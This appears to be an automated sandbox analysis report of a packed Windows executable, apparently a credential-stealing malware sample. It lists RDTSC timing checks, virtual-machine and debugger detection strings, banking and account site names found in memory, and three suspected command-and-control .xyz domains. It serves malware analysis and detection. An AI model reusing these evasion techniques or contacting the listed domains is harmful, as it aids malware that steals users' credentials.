                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60431 second address: 4F60437 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60437 second address: 4F60484 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx eax, bx 0x00000006 mov cl, dl 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b lea eax, dword ptr [ebp-2Ch] 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F4EF0C09E1Bh 0x00000017 sub cx, 575Eh 0x0000001c jmp 00007F4EF0C09E29h 0x00000021 popfd 0x00000022 jmp 00007F4EF0C09E20h 0x00000027 popad 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60484 second address: 4F604D8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bh, 5Dh 0x00000005 mov edi, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4EF0C79892h 0x00000012 jmp 00007F4EF0C79895h 0x00000017 popfd 0x00000018 mov di, si 0x0000001b popad 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F4EF0C79898h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F604D8 second address: 4F60552 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov dl, 37h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c mov ah, 1Dh 0x0000000e pushfd 0x0000000f jmp 00007F4EF0C09E27h 0x00000014 and eax, 0065D23Eh 0x0000001a jmp 00007F4EF0C09E29h 0x0000001f popfd 0x00000020 popad 0x00000021 nop 0x00000022 jmp 00007F4EF0C09E1Eh 0x00000027 push eax 0x00000028 jmp 00007F4EF0C09E1Bh 0x0000002d nop 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F4EF0C09E25h 0x00000035 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60552 second address: 4F60562 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C7988Ch 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60562 second address: 4F60571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60571 second address: 4F605A1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79890h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F4EF0C79897h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F605EC second address: 4F605F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F605F0 second address: 4F50EAC instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F4EF0C7988Ah 0x00000008 adc ecx, 352F1A48h 0x0000000e jmp 00007F4EF0C7988Bh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 mov cx, 5DBFh 0x0000001a popad 0x0000001b je 00007F4F617778C5h 0x00000021 xor eax, eax 0x00000023 jmp 00007F4EF0C52FBAh 0x00000028 pop esi 0x00000029 pop edi 0x0000002a pop ebx 0x0000002b leave 0x0000002c retn 0004h 0x0000002f nop 0x00000030 xor ebx, ebx 0x00000032 cmp eax, 00000000h 0x00000035 je 00007F4EF0C799E3h 0x0000003b call 00007F4EF58F7BABh 0x00000040 mov edi, edi 0x00000042 pushad 0x00000043 mov cx, di 0x00000046 popad 0x00000047 xchg eax, ebp 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov ebx, ecx 0x0000004d popad 0x0000004e rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50EAC second address: 4F50EB2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50EB2 second address: 4F50EB6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50EB6 second address: 4F50EF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F4EF0C09E1Ah 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F4EF0C09E20h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 mov bl, 23h 0x0000001b call 00007F4EF0C09E26h 0x00000020 pop eax 0x00000021 popad 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50EF9 second address: 4F50F14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79897h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50F14 second address: 4F50F3D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cx, dx 0x00000012 mov dl, B8h 0x00000014 popad 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F50F3D second address: 4F50F99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0388B302h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jmp 00007F4EF0C79892h 0x00000012 pushfd 0x00000013 jmp 00007F4EF0C79892h 0x00000018 xor ax, 51C8h 0x0000001d jmp 00007F4EF0C7988Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ecx 0x00000025 pushad 0x00000026 mov esi, 0270DC5Bh 0x0000002b push ecx 0x0000002c pushad 0x0000002d popad 0x0000002e pop edx 0x0000002f popad 0x00000030 mov dword ptr [ebp-04h], 55534552h 0x00000037 pushad 0x00000038 push eax 0x00000039 push edx 0x0000003a mov edx, esi 0x0000003c rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60B1F second address: 4F60B6E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [75AB459Ch], 05h 0x00000010 jmp 00007F4EF0C09E1Eh 0x00000015 je 00007F4F616F7CC4h 0x0000001b jmp 00007F4EF0C09E20h 0x00000020 pop ebp 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 popad 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60B6E second address: 4F60B72 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F60B72 second address: 4F60B78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F7091F second address: 4F70923 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70923 second address: 4F70927 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70927 second address: 4F7092D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F7092D second address: 4F70933 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70933 second address: 4F70937 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70937 second address: 4F70996 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F4EF0C09E1Fh 0x00000012 or esi, 6534C12Eh 0x00000018 jmp 00007F4EF0C09E29h 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007F4EF0C09E20h 0x00000024 sbb ax, E6A8h 0x00000029 jmp 00007F4EF0C09E1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70996 second address: 4F709AE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F4EF0C79894h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F709AE second address: 4F709B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F709B2 second address: 4F70A84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F4EF0C7988Ch 0x00000010 adc esi, 57549438h 0x00000016 jmp 00007F4EF0C7988Bh 0x0000001b popfd 0x0000001c mov esi, 4511FA6Fh 0x00000021 popad 0x00000022 xchg eax, esi 0x00000023 jmp 00007F4EF0C79892h 0x00000028 mov esi, dword ptr [ebp+0Ch] 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F4EF0C7988Eh 0x00000032 or si, CDC8h 0x00000037 jmp 00007F4EF0C7988Bh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007F4EF0C79898h 0x00000043 and al, 00000028h 0x00000046 jmp 00007F4EF0C7988Bh 0x0000004b popfd 0x0000004c popad 0x0000004d test esi, esi 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 call 00007F4EF0C7988Bh 0x00000057 pop esi 0x00000058 pushfd 0x00000059 jmp 00007F4EF0C79899h 0x0000005e sub ax, 76F6h 0x00000063 jmp 00007F4EF0C79891h 0x00000068 popfd 0x00000069 popad 0x0000006a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70A84 second address: 4F70AEB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F4F616E7734h 0x0000000f pushad 0x00000010 mov dl, cl 0x00000012 call 00007F4EF0C09E29h 0x00000017 pop edi 0x00000018 popad 0x00000019 cmp dword ptr [75AB459Ch], 05h 0x00000020 jmp 00007F4EF0C09E1Ah 0x00000025 je 00007F4F616FF7DFh 0x0000002b jmp 00007F4EF0C09E20h 0x00000030 xchg eax, esi 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 push ebx 0x00000035 pop eax 0x00000036 popad 0x00000037 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70AEB second address: 4F70B1C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C79895h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f mov cl, FBh 0x00000011 popad 0x00000012 xchg eax, esi 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F4EF0C7988Ch 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | RDTSC instruction interceptor: First address: 4F70C0E second address: 4F70C61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4EF0C09E29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push ebx 0x0000000e pop ecx 0x0000000f pushfd 0x00000010 jmp 00007F4EF0C09E1Fh 0x00000015 and cx, 87FEh 0x0000001a jmp 00007F4EF0C09E29h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Special instruction interceptor: First address: 2F7C39 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Special instruction interceptor: First address: 4A2B27 instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Special instruction interceptor: First address: 52ACEE instructions caused by: Self-modifying code
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7388 | Thread sleep time: -38019s >= -30000s
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7812 | Thread sleep time: -240000s >= -30000s
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe TID: 7364 | Thread sleep time: -32016s >= -30000s
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Last function: Thread delayed
                Source: Amcache.hve.11.dr | Binary or memory string: VMware
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.00000000011D7000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWp
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office.comVMware20,11696492231s
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: AMC password management pageVMware20,11696492231
                Source: Amcache.hve.11.dr | Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000002.1874782719.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1482668636.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1401268894.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1405967679.0000000001215000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427588716.0000000001215000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: outlook.office365.comVMware20,11696492231t
                Source: Amcache.hve.11.dr | Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: discord.comVMware20,11696492231f
                Source: Amcache.hve.11.dr | Binary or memory string: vmci.sys
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: global block list test formVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: bankofamerica.comVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tasks.office.comVMware20,11696492231o
                Source: Amcache.hve.11.dr | Binary or memory string: VMware20,1
                Source: Amcache.hve.11.dr | Binary or memory string: Microsoft Hyper-V Generation Counter
                Source: Amcache.hve.11.dr | Binary or memory string: NECVMWar VMware SATA CD00
                Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual disk SCSI Disk Device
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: Amcache.hve.11.dr | Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                Source: Amcache.hve.11.dr | Binary or memory string: Microsoft Hyper-V Virtualization Infrastructure Driver
                Source: Amcache.hve.11.dr | Binary or memory string: VMware PCI VMCI Bus Device
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: Amcache.hve.11.dr | Binary or memory string: VMware VMCI Bus Device
                Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual RAM
                Source: Amcache.hve.11.dr | Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW201.00V.20829224.B64.2211211842,BiosReleaseDate:11/21/2022,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware20,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: Amcache.hve.11.dr | Binary or memory string: VMware-42 27 88 19 56 cc 59 1a-97 79 fb 8c bf a1 e2 9d
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: Amcache.hve.11.dr | Binary or memory string: vmci.inf_amd64_68ed49469341f563
                Source: FBmz85HS0d.exe, 00000000.00000002.1873743187.0000000000482000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: Amcache.hve.11.dr | Binary or memory string: VMware Virtual USB Mouse
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: Amcache.hve.11.dr | Binary or memory string: vmci.syshbin
                Source: Amcache.hve.11.dr | Binary or memory string: VMware, Inc.
                Source: Amcache.hve.11.dr | Binary or memory string: VMware20,1hbin@
                Source: Amcache.hve.11.dr | Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: Amcache.hve.11.dr | Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.dr | Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005949000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: - GDCDYNVMware20,11696492231p
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: Amcache.hve.11.drBinary or memory string: c:/windows/system32/drivers/vmci.sys
                Source: Amcache.hve.11.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: Amcache.hve.11.drBinary or memory string: vmci.syshbin`
                Source: Amcache.hve.11.drBinary or memory string: \driver\vmci,\driver\pci
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: Amcache.hve.11.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
                Source: Amcache.hve.11.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: FBmz85HS0d.exe, 00000000.00000002.1873743187.0000000000482000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                Source: FBmz85HS0d.exe, 00000000.00000003.1355151580.0000000005943000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeSystem information queried: ModuleInformationJump to behavior
                Source: C:\Users\user\Desktop\FBmz85HS0d.exeProcess information queried: ProcessInformationJump to behavior

                Anti Debugging

                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Thread information set: HideFromDebugger
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: regmonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: gbdyllo
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: procmon_window_class
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: ollydbg
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: filemonclass
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: NTICE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: SICE
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | File opened: SIWVID
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process queried: DebugPort
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Process queried: DebugPort

                HIPS / PFW / Operating System Protection Evasion

                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: steppriflej.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: sendypaster.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873295299.00000000002A1000.00000040.00000001.01000000.00000003.sdmp | String found in binary or memory: cuddlyready.xyz
                Source: FBmz85HS0d.exe, 00000000.00000002.1873912279.00000000004C6000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: @XProgram Manager
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Queries volume information: C:\ VolumeInformation
                Source: C:\Users\user\Desktop\FBmz85HS0d.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                Source: FBmz85HS0d.exe, FBmz85HS0d.exe, 00000000.00000003.1427588716.00000000011FE000.00000004.00000020.00020000.00000000.sdmp, FBmz85HS0d.exe, 00000000.00000003.1427541815.0000000001224000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                Source: Amcache.hve.11.dr | Binary or memory string: MsMpEng.exe
